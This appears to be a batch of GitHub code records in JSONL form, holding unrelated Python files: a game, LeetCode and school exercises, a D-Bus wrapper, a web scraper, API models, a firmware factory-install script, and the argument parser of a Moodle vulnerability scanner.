\\n\\n{high_score}\")\n    except:\n        print(\"There is no new high scores..\")\n    sleep(3)\n    menu()\n    \n\n    \n\nif __name__ == '__main__':\n    menu()\n    \n","repo_name":"Simon0568/PythonProjects","sub_path":"numGuess/numGuess.py","file_name":"numGuess.py","file_ext":"py","file_size_in_byte":3558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"4821236287","text":"import numpy as np\ndef elipse_parameters(sub):\n    x0 = (np.min(sub['x'])+np.max(sub['x']))/2. #x-position of the center\n    y0 = (np.min(sub['y'])+np.max(sub['y']))/2. #y-position of the center\n    a = np.absolute(np.min(sub['x'])-np.max(sub['x']))/2.#radius on the x-axis\n    b = np.absolute(np.min(sub['y'])-np.max(sub['y']))/2.#radius on the y-axis\n    return {\"x0\":x0,\"y0\":y0,\"a\":a,\"b\":b}\n\ndef elipse(sub, error=0.01):\n    e = elipse_parameters(sub)\n    value = ((sub['x'] - e['x0'])/e['a'])**2 + ((sub['y'] - e['y0'])/e['b'])**2\n    indTrue = np.where((value > 1.- error)*(value < 1.+ error))[0]\n    #indFalse = np.setdiff1d(np.arange(len(x)),indTrue)\n    return indTrue#{\"True\":indTrue,\"False\":indFalse}\n    \ndef new_index(sub,Ngrid,nppix, error_elipse=0.01):#numero por pixel\n    #timei = time.time()\n    nlim = int(nppix)\n    ind = []\n    xg = np.linspace(sub['x'].min(),sub['x'].max(),endpoint=True,num=Ngrid)\n    yg = np.linspace(sub['y'].min(),sub['y'].max(),endpoint=True,num=Ngrid)\n    Nx = len(xg)\n    Ny = len(yg)\n    Xd = sub['x']\n    Yd = sub['y']\n    for iy in range(Ny-1):\n        for ix in range(Nx-1):\n            ind_ = np.where((Xd>=xg[ix])*(Xd<=xg[ix+1])*(Yd>=yg[iy])*(Yd<=yg[iy+1]))[0]\n            n = len(ind_)\n            if n>nlim:\n                count = int(n-nlim)\n                ind_ = np.random.permutation(ind_)[:count]\n                ind = np.concatenate([ind,ind_])\n    ind = np.unique(ind).astype(int)\n    indn = np.setdiff1d(np.arange(len(Xd)),ind)\n    indElipse = elipse(sub, error=0.01)\n    indn = np.setdiff1d(indn,indElipse)\n    #print(\"tempo: {0:.3f} sec\".format(-timei + time.time()))\n    #print(\"antes = {}, depois = {}\".format(len(Xd),len(indn)))\n    return indn\n","repo_name":"multinverse/BINGO_OpticalDesign","sub_path":"Resampling.py","file_name":"Resampling.py","file_ext":"py","file_size_in_byte":1771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"2485173127","text":"\n\n\n# 这显然是一个二分查找\n\n\ndef searchInsert(nums, target: int) -> int:\n    n = len(nums)\n    l=0\n    r=n-1\n\n    while(l<=r):\n        mid = (l+r)//2\n        if nums[mid]==target:\n            # 由于题目给定了无重的条件,可以直接返回\n            return mid\n        elif nums[mid] > target:\n            r = mid-1\n        else:\n            l = mid+1\n\n    return l\n\nprint(searchInsert([1,3,5,6],0))","repo_name":"August1s/LeetCode","sub_path":"Array/No35搜索插入位置.py","file_name":"No35搜索插入位置.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"74438670771","text":"import atexit\nfrom threading import Thread, Lock\n\nimport gobject\nimport dbus\nfrom dbus.mainloop.glib import DBusGMainLoop\n\n\nclass Bus(object):\n\n    def __init__(self, bus, iface, path):\n        self.bus = bus\n        self.iface = iface\n        self.path = path\n\n    def add_callback(self, func, name, iface=None, path=None):\n        if iface is None:\n            iface = self.iface\n        return self.bus.add_signal_receiver(\n            func, dbus_interface=iface,\n            signal_name=name, path=path)\n\n    def get_interface(self, iface=None, path=None):\n        if iface is None:\n            iface = self.iface\n        if path is None:\n            path = self.path\n        obj = self.bus.get_object(self.iface, path)\n        return dbus.Interface(obj, dbus_interface=iface)\n\n    def get_prop_interface(self, iface=None, path=None):\n        if iface is None:\n            iface = self.iface\n        return Prop(self.get_interface(dbus.PROPERTIES_IFACE, path), iface)\n\n\n_DBUS_INSTANCE = None\n_DBUS_INSTANCE_LOCK = Lock()\n\nclass Dbus(object):\n\n    def __init__(self):\n        bus_loop = DBusGMainLoop(set_as_default=True)\n        gobject.threads_init()\n        dbus.mainloop.glib.threads_init()\n        self.main_loop = gobject.MainLoop()\n        self.thread = Thread(target=self.main_loop.run,\n                             name='glib_dbus_main_loop')\n        self.thread.daemon = True\n        self.thread.start()\n        self.system_bus = dbus.SystemBus(mainloop=bus_loop)\n        self.session_bus = dbus.SessionBus(mainloop=bus_loop)\n\n    def unload(self):\n        self.main_loop.quit()\n        self.session_bus.close()\n        self.system_bus.close()\n        self.thread.join()\n\n\ndef get_system_bus(iface, path):\n    if _DBUS_INSTANCE is None:\n        _init_dbus_instance()\n    return Bus(_DBUS_INSTANCE.system_bus, iface, path)\n\ndef get_session_bus(iface, path):\n    if _DBUS_INSTANCE is None:\n        _init_dbus_instance()\n    return Bus(_DBUS_INSTANCE.session_bus, iface, path)\n\n\ndef _init_dbus_instance():\n    global _DBUS_INSTANCE\n    with _DBUS_INSTANCE_LOCK:\n        if _DBUS_INSTANCE is not None:\n            return\n        _DBUS_INSTANCE = Dbus()\n\n@atexit.register\ndef _unload_dbus_instance():\n    global _DBUS_INSTANCE\n    with _DBUS_INSTANCE_LOCK:\n        if _DBUS_INSTANCE is None:\n            return\n        _DBUS_INSTANCE.unload()\n        _DBUS_INSTANCE = None\n\n\n_DICT_METHODS = set(('keys', 'iterkeys',\n                     'values', 'itervalues',\n                     'items', 'iteritems'))\n\nclass Prop(object):\n\n    def __init__(self, prop, iface):\n        self.prop = prop\n        self.iface = iface\n\n    def __getattr__(self, name):\n        if name in _DICT_METHODS:\n            return getattr(self.prop.GetAll(self.iface), name)\n        return self.prop.Get(self.iface, name)\n\n    def __getitem__(self, name):\n        return self.prop.Get(self.iface, name)\n\n    def __len__(self):\n        return len(self.prop.GetAll(self.iface))\n\n    def __iter__(self):\n        return self.prop.GetAll(self.iface).iterkeys()\n\n    def __list__(self):\n        return list(self.prop.GetAll(self.iface))\n\n    def __contains__(self, item):\n        return item in self.prop.GetAll(self.iface)\n","repo_name":"epontan/python-wmiirc-plugins","sub_path":"dbus_instance.py","file_name":"dbus_instance.py","file_ext":"py","file_size_in_byte":3193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"13338290163","text":"from lxml import html, etree\r\nimport requests\r\nimport numpy as np\r\nimport sys\r\nimport pickle\r\nimport time #DEBUG\r\n\r\nMIN_WORD_COUNT = 100\r\nMAX_WORD_COUNT = 1500\r\nMIN_RR_OCCURENCE = 3\r\nMIN_RATIO = 0.05\r\nSEARCHED_PHONEME = 'rr'\r\nWEBSITE_LINK = 'https://rhinospike.com'\r\nEMAIL = 'doerinrw'\r\nPASSWORD = 'password'\r\n\r\ndef readLangPage(num):\r\n    '''readLangPage\r\n    This method is built to read a single page of the \"sort by language\" search pages,\r\n    with no search string given. \r\n    num: The index of the search page to be processed. \r\n    \r\n    Returns: A dictionary, containing string URLs of valid pages,\r\n    keyed to the ratio of trilled RRs for each.'''\r\n    validPages = {}\r\n    page = requests.get('https://rhinospike.com/language/spa/recordings/?page=' + str(num))\r\n    tree = html.fromstring(page.content)\r\n    \r\n    \r\n    nextTitleTreeName = '//*[@id=\"left_panel\"]/div/div/div/table/tbody/tr/td[2]/div/span[3]/a' \r\n    nextWordCountTreeName = '//*[@id=\"left_panel\"]/div/div/div/table/tbody/tr/td[2]/div[3]/span'\r\n\r\n\r\n    for i in range(2, 12):\r\n        #//*[@id=\"left_panel\"]/div/div[1]/div[2]\r\n        #//*[@id=\"left_panel\"]/div/div[1]/div[1]\r\n\r\n        #This block gets the title and link from the title element\r\n        titleTree = tree.xpath(nextTitleTreeName)\r\n        link = WEBSITE_LINK + titleTree[0].get('href')\r\n        title = titleTree[0].text\r\n\r\n        #This block gets the path to the hidden text using the unique ID number drawn from the link value\r\n        recordingIDNumber = link.split('/')[-2]\r\n        textTreeName = '//*[@id=\"audio_request_{0}\"]'.format(recordingIDNumber)\r\n        textTree = tree.xpath(textTreeName)\r\n\r\n        #This block gets the actual text itself\r\n        text = ''\r\n        for element in textTree[0].getchildren():\r\n            paragraphText = element.text\r\n            if paragraphText != None:#has to check for breaks that would create a type error\r\n                text += paragraphText \r\n        \r\n        #This block gets the word count total as an integer\r\n        wordCountTree = tree.xpath(nextWordCountTreeName)\r\n        wordCount = wordCountTree[0].text.split()[0] #gets a string of just the number, without ' Words'\r\n        wordCount = int(wordCount)\r\n\r\n\r\n        #Now, all that's left is to do analysis of the gathered values, determining validity of the recording. \r\n        RRcount = text.count(SEARCHED_PHONEME)\r\n        validExample = wordCount > MIN_WORD_COUNT and wordCount < MAX_WORD_COUNT and RRcount >= MIN_RR_OCCURENCE\r\n        if validExample:\r\n            print('RR count:', RRcount) #DEBUG\r\n            validPages[link] = RRcount \r\n\r\n        nextTitleTreeName = '//*[@id=\"left_panel\"]/div/div/div[{0}]/table/tbody/tr/td[2]/div/span[3]/a'.format(str(i))\r\n        nextWordCountTreeName = '//*[@id=\"left_panel\"]/div/div/div[{0}]/table/tbody/tr/td[2]/div[3]/span'.format(str(i))\r\n\r\n    return validPages\r\n\r\n\r\n\r\ndef readSearchPage(num):\r\n    '''readSearchPage\r\n    This method is built to read a single page of the normal search pages,\r\n    with some sort of search string given. \r\n    num: The index of the search page to be processed. \r\n    \r\n    Returns: A dictionary, containing string URLs of valid pages,\r\n    keyed to the ratio of trilled RRs for each.'''\r\n\r\n    validPages = {}\r\n    page = requests.get('https://rhinospike.com/search/?page=' + str(num) + '&q=rr&language=2')\r\n    tree = html.fromstring(page.content)\r\n\r\n    for i in range(1, 11):\r\n        titleTree = tree.xpath('//*[@id=\"left_panel\"]/div/div[' + str(i) \r\n            + ']/table/tbody/tr/td[2]/div[1]/span[3]/a')\r\n        wordCountTree = tree.xpath('//*[@id=\"left_panel\"]/div/div[' + str(i) \r\n            + ']/table/tbody/tr/td[2]/div[3]/span[1]')\r\n\r\n        #Quick and dirty fix for an error where the first element doesn't work properly\r\n        if i == 1:\r\n            titleTree = tree.xpath('//*[@id=\"left_panel\"]/div/div/table/tbody/tr/td[2]/div/span[3]/a')\r\n            wordCountTree = tree.xpath('//*[@id=\"left_panel\"]/div/div/table/tbody/tr/td[2]/div[3]/span')\r\n\r\n        link = WEBSITE_LINK + titleTree[0].get('href')\r\n        title = titleTree[0].text\r\n\r\n        #indexing at end gets a string of just the number, without ' Words'\r\n        wordCount = wordCountTree[0].text[:-6]\r\n        wordCount = int(wordCount)\r\n\r\n        if wordCount > MIN_WORD_COUNT and wordCount < MAX_WORD_COUNT:\r\n            validPages[title] = link\r\n    return validPages\r\n\r\ndef getTranscript(link):\r\n    page = requests.get(link)\r\n    tree = html.fromstring(page.content)\r\n\r\n    textTree = tree.xpath('//*[@id=\"left_panel\"]/div/div/div/div[2]')\r\n    text = ''\r\n    for element in textTree[0].getchildren():\r\n        text += element.text\r\n    return text\r\n\r\ndef processPage(link, mod):\r\n    '''\r\n    processPage\r\n    DEPRECIATED, as it fails to properly login to download the files. \r\n    link: a link to the page to be processed\r\n    session: a session object that's already logged in\r\n    mode: determines which folder to save the results to. \r\n    Can be 'test', 'training', or 'cv'.\r\n    '''\r\n    page = requests.get(url=link, auth=auth) \r\n    tree = html.fromstring(page.content)\r\n\r\n    textTree = tree.xpath('//*[@id=\"left_panel\"]/div/div/div/div[2]')\r\n    text = ''\r\n    for element in textTree[0].getchildren():\r\n        text += element.text\r\n\r\n    if text.count(SEARCHED_PHONEME) < MIN_RR_OCCURENCE:\r\n        return False\r\n\r\n    #Fetches the link from the transcription page\r\n    downloadTree = tree.xpath('//*[@id=\"left_panel\"]/div/div/div/ul/li/span[3]/a')\r\n\r\n    for element in tree.xpath(\"//*[@id='left_panel']/div/div/div/ul/li/span[3]/a\"):\r\n        print(element.get('href'))\r\n    #If the top link is locked behind a paywall, it skips it. \r\n    # for child in tree.xpath('//*[@id=\"left_panel\"]/div/div/div/ul')[0].iterchildren():\r\n    #     print('Recorder Name:', child.find('/a/strong')[0].text)\r\n    #     print('Child:', len(child.find('/span[3]')))\r\n    #while downloadTree.text == 'Unlock' and count < 3:\r\n    #    downloadTree = tree.xpath('//*[@id=\"left_panel\"]/div/div/div/ul/li[2]/span[3]/a')\r\n    #    count += 1\r\n    downloadLink = WEBSITE_LINK + downloadTree[0].get('href')\r\n    \r\n\r\n    print('Download Link:', downloadLink) #DEBUG\r\n\r\n    # Follows the link to the download page\r\n    # downloadPage = requests.get(downloadLink)\r\n    # downloadPageTree = html.fromstring(page.content)\r\n\r\n    #Downloads the actual file\r\n    # downloadLink = downloadPageTree.xpath('//*[@id=\"body\"]/p[4]/a')\r\n    # downloadedFile = requests.get(downloadLink).content\r\n    \r\n    \r\n    #Saves the file with the title of the transcription as its title\r\n    # mp3Name = tree.xpath('//*[@id=\"left_panel\"]/div/div/div/table/tbody/tr/td[2]/div/span[3]/a')[0].text\r\n    # mp3Name = '.\\Raw Data\\mp3\\\\' + mode + '\\\\'+ mp3Name + '.mp3'\r\n    # song = open(mp3Name, 'wb')\r\n    # song.write(downloadedFile)\r\n    # song.close()\r\n    return True\r\n\r\ndef rhinoSpikeLogin():\r\n    '''\r\n    Pulled from a helpful stackOverflow user: \r\n    https://stackoverflow.com/questions/8316818/login-to-website-using-python/8316989#8316989\r\n\r\n    '''\r\n    # Start a session so we can have persistant cookies\r\n    mySession = requests.Session()\r\n\r\n    # This is the form data that the page sends when logging in\r\n    login_data = {\r\n        'loginemail': EMAIL,\r\n        'loginpswd': PASSWORD,\r\n        #'submit': 'Log in',\r\n    }\r\n\r\n    # Authenticate\r\n    r = mySession.post(WEBSITE_LINK + '/account/login', data=login_data)\r\n    print('Status Code:', r.status_code) #DEBUG\r\n    \r\n    return mySession\r\n\r\ndef saveObj(name, obj):\r\n    '''saveObj\r\n    Credit due to user Zah, from:\r\n    https://stackoverflow.com/questions/19201290/how-to-save-a-dictionary-to-a-file'''\r\n    with open(name + '.pkl', 'wb') as f:\r\n        pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)\r\n\r\ndef loadObj(name):\r\n    '''loadObj\r\n    Credit due to user Zah, from:\r\n    https://stackoverflow.com/questions/19201290/how-to-save-a-dictionary-to-a-file'''\r\n    with open(name + '.pkl', 'rb') as f:\r\n        return pickle.load(f)\r\n\r\nif __name__ == '__main__':\r\n    finalURLs = loadObj('validURLs')\r\n    # finalURLs = {}\r\n    print('{0} URLs loaded from previous runs.'.format(len(finalURLs)))\r\n    for num in range(101, 500):\r\n        validPages = readLangPage(num)\r\n        print('Page {0} returned:'.format(num), validPages) #DEBUG\r\n        finalURLs = dict(finalURLs, **validPages)\r\n        print('Len:', len(finalURLs)) #DEBUG\r\n        if num % 100 == 0:\r\n            saveObj('validURLs', finalURLs)\r\n            time.sleep(1000)\r\n    \r\n    saveObj('validURLs', finalURLs)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n# '//*[@id=\"left_panel\"]/div/div[1]/table/tbody/tr/td[2]/div[3]/span[1]'\r\n# '//*[@id=\"left_panel\"]/div/div[2]/table/tbody/tr/td[2]/div[3]/span[1]'\r\n# '//*[@id=\"left_panel\"]/div/div[3]/table/tbody/tr/td[2]/div[3]/span[1]'\r\n\r\n    \r\n\r\n\r\n","repo_name":"robbwdoering/AutoFono","sub_path":"webScraper.py","file_name":"webScraper.py","file_ext":"py","file_size_in_byte":8866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"33901303663","text":"import datetime\nfrom typing import TYPE_CHECKING, Any, Dict, List, Type, TypeVar\n\nimport attr\nfrom dateutil.parser import isoparse\n\nif TYPE_CHECKING:\n    from ..models.order_acknowledgement_item import OrderAcknowledgementItem\n    from ..models.party_identification import PartyIdentification\n\n\nT = TypeVar(\"T\", bound=\"OrderAcknowledgement\")\n\n\n@attr.s(auto_attribs=True)\nclass OrderAcknowledgement:\n    r\"\"\"\n    Attributes:\n        purchase_order_number (str): The purchase order number. Formatting Notes: 8-character alpha-numeric code.\n        selling_party (PartyIdentification):\n        acknowledgement_date (datetime.datetime): The date and time when the purchase order is acknowledged, in ISO-8601\n            date/time format.\n        items (List['OrderAcknowledgementItem']): A list of the items being acknowledged with associated details.\n    \"\"\"\n\n    purchase_order_number: str\n    selling_party: \"PartyIdentification\"\n    acknowledgement_date: datetime.datetime\n    items: List[\"OrderAcknowledgementItem\"]\n    additional_properties: Dict[str, Any] = attr.ib(init=False, factory=dict)\n\n    def to_dict(self) -> Dict[str, Any]:\n        purchase_order_number = self.purchase_order_number\n        selling_party = self.selling_party.to_dict()\n\n        acknowledgement_date = self.acknowledgement_date.isoformat()\n\n        items = []\n        for items_item_data in self.items:\n            items_item = items_item_data.to_dict()\n\n            items.append(items_item)\n\n        field_dict: Dict[str, Any] = {}\n        field_dict.update(self.additional_properties)\n        field_dict.update(\n            {\n                \"purchaseOrderNumber\": purchase_order_number,\n                \"sellingParty\": selling_party,\n                \"acknowledgementDate\": acknowledgement_date,\n                \"items\": items,\n            }\n        )\n\n        return field_dict\n\n    @classmethod\n    def from_dict(cls: Type[T], src_dict: Dict[str, Any]) -> T:\n        from ..models.order_acknowledgement_item import OrderAcknowledgementItem\n        from ..models.party_identification import PartyIdentification\n\n        d = src_dict.copy()\n        purchase_order_number = d.pop(\"purchaseOrderNumber\")\n\n        selling_party = PartyIdentification.from_dict(d.pop(\"sellingParty\"))\n\n        acknowledgement_date = isoparse(d.pop(\"acknowledgementDate\"))\n\n        items = []\n        _items = d.pop(\"items\")\n        for items_item_data in _items:\n            items_item = OrderAcknowledgementItem.from_dict(items_item_data)\n\n            items.append(items_item)\n\n        result = cls(\n            purchase_order_number=purchase_order_number,\n            selling_party=selling_party,\n            acknowledgement_date=acknowledgement_date,\n            items=items,\n        )\n\n        result.additional_properties = d\n        return result\n\n    @property\n    def additional_keys(self) -> List[str]:\n        return list(self.additional_properties.keys())\n\n    def __getitem__(self, key: str) -> Any:\n        return self.additional_properties[key]\n\n    def __setitem__(self, key: str, value: Any) -> None:\n        self.additional_properties[key] = value\n\n    def __delitem__(self, key: str) -> None:\n        del self.additional_properties[key]\n\n    def __contains__(self, key: str) -> bool:\n        return key in self.additional_properties\n","repo_name":"milyord/sp-api","sub_path":"sp/vendor_orders/models/order_acknowledgement.py","file_name":"order_acknowledgement.py","file_ext":"py","file_size_in_byte":3311,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"38387096631","text":"import logging\n\nimport sqlalchemy.exc as exc\n\nimport config\n\n\ndef setup_logger():\n    logger_ = logging.getLogger('Database')\n    logger_.setLevel(logging.INFO)\n\n    formatter = logging.Formatter(\n        '%(asctime)s %(levelname)s - %(name)s: \"%(message)s\"'\n    )\n\n    stderr_handler = logging.StreamHandler()\n    stderr_handler.setFormatter(formatter)\n    logger_.addHandler(stderr_handler)\n\n    if config.database_log_file is not None:\n        file_handler = logging.FileHandler(config.database_log_file, encoding='utf-8')\n        file_handler.setFormatter(formatter)\n        logger_.addHandler(file_handler)\n\n    return logger_\n\n\ndef log(func):\n    def wrapper(*args, **kwargs):\n        logger.info(f'Function {func.__module__}.{func.__name__} called with args: {args}, kwargs: {kwargs}')\n        try:\n            result = func(*args, **kwargs)\n            logger.info(f'Function {func.__module__}.{func.__name__} returned {result}')\n            return result\n        except exc.SQLAlchemyError as e:\n            logger.error(f'Function {func.__module__}.{func.__name__} raised {e}')\n            raise exc.SQLAlchemyError(f\"{func.__module__}.{func.__name__}, error description: {e.args[0]}!\")\n\n    return wrapper\n\n\nlogger = setup_logger()\n","repo_name":"Cub11k/lavochki-bot-df-2023","sub_path":"database/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"7206171541","text":"# Number 1\ncount = 0\nraz = 100000000\ndata = []\nfor i in open('17-3.txt'):\n    data.append(int(i))\nfor i in range(len(data) - 2):\n    troyka = [data[i], data[i + 1], data[i + 2]]\n    if troyka[0] <= troyka[1] <= troyka[2]:\n        raz = min(raz, max(troyka) - min(troyka))\n        count += 1\nprint('\\n#1:', count, raz)\n\n'-----------------------------------------------'\n\n# Number 2\ncount = 0\ndata = []\nfor i in open('17-4.txt'):\n    data.append(int(i))\nnumbers = []\nfor i in data:\n    if i % 3 == 0 and i % 9 != 0 and i % 10 >= 4:\n        numbers.append(i)\nprint('#2:', len(numbers), sum(numbers) // len(numbers))\n\n'-----------------------------------------------'\n\n# Number 3\ncount = 0\ndata = []\nfor i in open('17-4.txt'):\n    data.append(int(i))\nnumbers = []\nfor i in data:\n    if i % 13 == 7 and i % 7 != 0 and i % 11 != 0:\n        numbers.append(i)\nprint('#3:', max(numbers) - min(numbers), len(numbers))\n\n\n'''\n    #1: 832 460\n    #2: 247 5706\n    #3: 8515 126\n'''\n","repo_name":"Andrey-Bedretdinov/School","sub_path":"Архив/Самостоятельные работы/Бедретдинов СР Вариант 3 14.12.21/Бедретдинов СР Вариант 3 14.12.21.py","file_name":"Бедретдинов СР Вариант 3 14.12.21.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"70992273","text":"import requests\nimport datetime\nimport json\n\ndef send_application(url, vote_link, token, name='', position=None):\n\n    request = {\n        'content': '',\n        'embeds': [\n            {\n                'title': 'New application received!',\n                'icon_url': '',\n                'timestamp': datetime.datetime.utcnow().isoformat(),\n                'description':\n                    ('`{name}` has applied' + (' for '+position if position is not None else '') + \n                    '!\\n'\n                    '[Admin panel]({vote_link}/{token})\\n'\n                    '[Member voting]({vote_link})'\n                    '').format(name=name, vote_link=vote_link, token=token)\n            }\n        ]\n    }\n\n    headers = {'Content-Type': 'application/json'}\n\n    request = json.dumps(request)\n    response = requests.post(url, data=request, headers=headers)\n    print('Sent discord webhook, response was ' + str(response))\n\n","repo_name":"lekro/frostcraft-web","sub_path":"web/discord.py","file_name":"discord.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"9370553443","text":"#!/usr/bin/env python\n'''\n  run factory load, calibration and test\n'''\n\nfrom config import *\nimport configcheck\nimport logger\nimport accelcal\nimport jtag\nimport power_control\nimport time\nimport util\nimport sys, os, fcntl\nimport logger\nimport colour_text\nimport connection\nimport rotate\nimport barcode\nimport savedstate\n\nfh = open(os.path.realpath(__file__), 'r')\ntry:\n    fcntl.flock(fh, fcntl.LOCK_EX|fcntl.LOCK_NB)\nexcept:\n    print(\"another instance of this script is already running. exiting...\")\n    sys.exit(0)\n\n# disable stdout buffering\nsys.stdout = os.fdopen(sys.stdout.fileno(), 'w', 0)\n\nfrom argparse import ArgumentParser\nparser = ArgumentParser(description=__doc__)\n\nparser.add_argument(\"--test\", default=False, action='store_true', help=\"run in test loop\")\nparser.add_argument(\"--once\", default=False, action='store_true', help=\"run one install only\")\nparser.add_argument(\"--nofw\", default=False, action='store_true', help=\"don't reload firmware\")\nparser.add_argument(\"--erase\", default=False, action='store_true', help=\"erase firmware and parameters\")\nparser.add_argument(\"--monitor\", default=None, help=\"monitor address\")\nparser.add_argument(\"--barcode\", default=None, help=\"override barcode\")\nargs = parser.parse_args()\n\nif args.monitor:\n    REMOTE_MONITOR['ref'] = args.monitor + \":16550\"\n    REMOTE_MONITOR['test'] = args.monitor + \":16551\"\n\ncolour_text.print_blue(\"Starting up\")\n\ndef factory_install(device_barcode):\n    '''main factory installer'''\n    start_time = time.time()\n\n    if not args.test:\n        colour_text.clear_screen()\n\n    # start a new log directory on each run\n    logger.new_log_dir()\n    logger.reopen_logfile()\n\n    logdir = logger.get_log_dir()\n    logger.info(\"Logging to %s\" % logdir)\n    logger.info(\"Device barcode %s\" % device_barcode)\n\n    colour_text.print_blue('''\n==================================================\n| Starting installation. Barcode is %s\n==================================================\n''' % device_barcode)\n\n    logger.info(time.ctime())\n    \n    if args.erase:\n        if not jtag.erase_firmwares():\n            colour_text.print_fail('''\n======================================\n| FAILED: JTAG firmware erase failed\n======================================\n''')\n            logger.critical(\"JTAG firmware erase failed\")\n            return False\n    \n    if not args.nofw and not jtag.load_all_firmwares(retries=3):\n        colour_text.print_fail('''\n======================================\n| FAILED: JTAG firmware install failed\n======================================\n''')\n        logger.critical(\"JTAG firmware install failed\")\n        try:\n            conn = connection.Connection(ref_only=True)\n            rotate.center_servos(conn)\n        except Exception as ex:\n            print(\"Failed to center servos: %s\" % ex)\n            pass\n        return False\n\n    if args.erase:\n        if not connection.erase_parameters():\n            colour_text.print_fail('''\n==========================================\n| FAILED: Failed to erase parameters\n==========================================\n''')\n            logger.critical(\"Failed to erase parameters\")\n            return False\n\n    if not accelcal.accel_calibrate_retries(retries=4):\n        colour_text.print_fail('''\n==========================================\n| FAILED: Accelerometer calibration failed\n==========================================\n''')\n        logger.critical(\"Accelerometer calibration failed\")\n        return False\n\n    # all OK\n    colour_text.print_green('''\n================================================\n| Device: %s\n| PASSED: Factory install complete (%u seconds)\n================================================\n''' % (device_barcode, (time.time() - start_time)))\n    logger.info(\"Factory install complete (%u seconds)\" % (time.time() - start_time))\n    return True\n\n# load the jig state file\nsavedstate.init()\nsavedstate.reset('current_cycles')\n\nwhile True:\n    logger.get_ftdi()\n    jigstate = savedstate.get()\n    logger.info(\"jigstate: total_cycles = %i\" % jigstate['total_cycles'])\n    logger.info(\"jigstate: current_cycles = %i\" % jigstate['current_cycles'])\n\n    util.kill_processes(['mavproxy.py', GDB])\n\n    if args.test:\n        # power cycle each time, simulating new board put in\n        power_control.power_cycle()\n    else:\n        # wait for the power to be switched off, disable serial logging\n        logger.info(\"waiting for power off\")\n        util.wait_no_device([FMU_JTAG, IO_JTAG], timeout=600)\n\n    device_barcode = args.barcode\n    if not args.test and device_barcode is None:\n        colour_text.print_blue('''\n==========================================\n| PLEASE SWIPE DEVICE BARCODE\n==========================================\n''')\n        device_barcode = barcode.barcode_read()\n        if device_barcode is None:\n            colour_text.print_fail('''\n    ==========================================\n    | FAILED: Barcode not detected\n    ==========================================\n    ''')\n            logger.critical(\"Barcode not detected\")\n            time.sleep(2)\n            continue\n    \n    # we don't use logger for the barcode here as we are still on the previous\n    # boards log\n    print(\"Got barcode: %s\" % device_barcode)\n    logger.info(\"Barcode detected\")\n    \n    # wait for the power to come on again\n    while not util.wait_devices([FMU_JTAG, IO_JTAG, FMU_DEBUG]):\n        logger.info(\"waiting for power up....\")\n\n    ret = factory_install(device_barcode)\n\n    # increment the cycles counters\n    savedstate.incr('current_cycles')\n    savedstate.incr('total_cycles')\n\n    if args.once:\n        sys.exit(int(not ret))\n","repo_name":"tridge/FWLoad","sub_path":"factoryload.py","file_name":"factoryload.py","file_ext":"py","file_size_in_byte":5664,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"}
type=int, default=1)\n\tparser.add_argument('-v', '--verbose', help='Verbosity level (default: 1)', type=int, default=1, dest='verbosity')\n\tparser.add_argument('-r', '--random-agent', help='Random User Agent (default: Chrome Win10)', action='store_const', const=True, dest='random_agent')\n\tparser.add_argument('-e', '--exploit', help='Enable exploit mode (default: check mode)', action='store_const', const=True)\n\tparser.add_argument('-s', '--scrape', help='Scraping mode: scrape all the pages from moodle and save the result in a JSON file (default: disabled)', action='store_const', const=True)\n\tparser.add_argument('-o', '--outfile', help='Output file to save scan results (in JSON format)')\n\tparser.add_argument('-m', '--list-modules', help='List all the community vulnerability modules', action='store_const', const=True, dest='list_modules')\n\tparser.add_argument('-U', '--update', help='Update badmoodle vulnerability database', action='store_const', const=True)\n\t\n\treturn parser\n\n\ndef parse_args():\n\treturn get_parser().parse_args()\n\n\ndef help():\n\treturn get_parser().print_help()\n\n\ndef usage():\n\treturn get_parser().print_usage()","repo_name":"cyberaz0r/badmoodle","sub_path":"utils/argparse.py","file_name":"argparse.py","file_ext":"py","file_size_in_byte":2704,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"21"} +{"seq_id":"18160246970","text":"import json\n\n# Define your input file containing a list of JSON objects\ninput_file = 'path/to/your/input_file.jsonl'\n\n# Define the output schema file\noutput_schema_file = 'json_schema.json'\n\n# Function to update the schema with the data from the given JSON object\ndef update_schema_with_object(schema, json_obj):\n for key, value in json_obj.items():\n if key not in schema:\n if isinstance(value, dict):\n schema[key] = {\n \"type\": \"object\",\n \"properties\": update_schema_with_object({}, value)\n }\n elif isinstance(value, list) and len(value) > 0 and isinstance(value[0], dict):\n schema[key] = {\n \"type\": \"array\",\n \"items\": {\n \"type\": \"object\",\n \"properties\": update_schema_with_object({}, value[0])\n }\n }\n else:\n schema[key] = {\n \"type\": type(value).__name__,\n \"example\": value\n }\n elif schema[key][\"type\"] == \"object\" and isinstance(value, dict):\n schema[key][\"properties\"] = update_schema_with_object(schema[key][\"properties\"], value)\n elif schema[key][\"type\"] == \"array\" and isinstance(value, list) and len(value) > 0 and isinstance(value[0], dict):\n schema[key][\"items\"][\"properties\"] = update_schema_with_object(schema[key][\"items\"][\"properties\"], value[0])\n\n return schema\n\n# Generate the JSON schema\ndef generate_json_schema(input_file):\n schema = {}\n with open(input_file, 'r') as file:\n for line in file:\n json_obj = json.loads(line.strip())\n schema = update_schema_with_object(schema, json_obj)\n return schema\n\n# Run the script and generate the JSON schema\njson_schema = 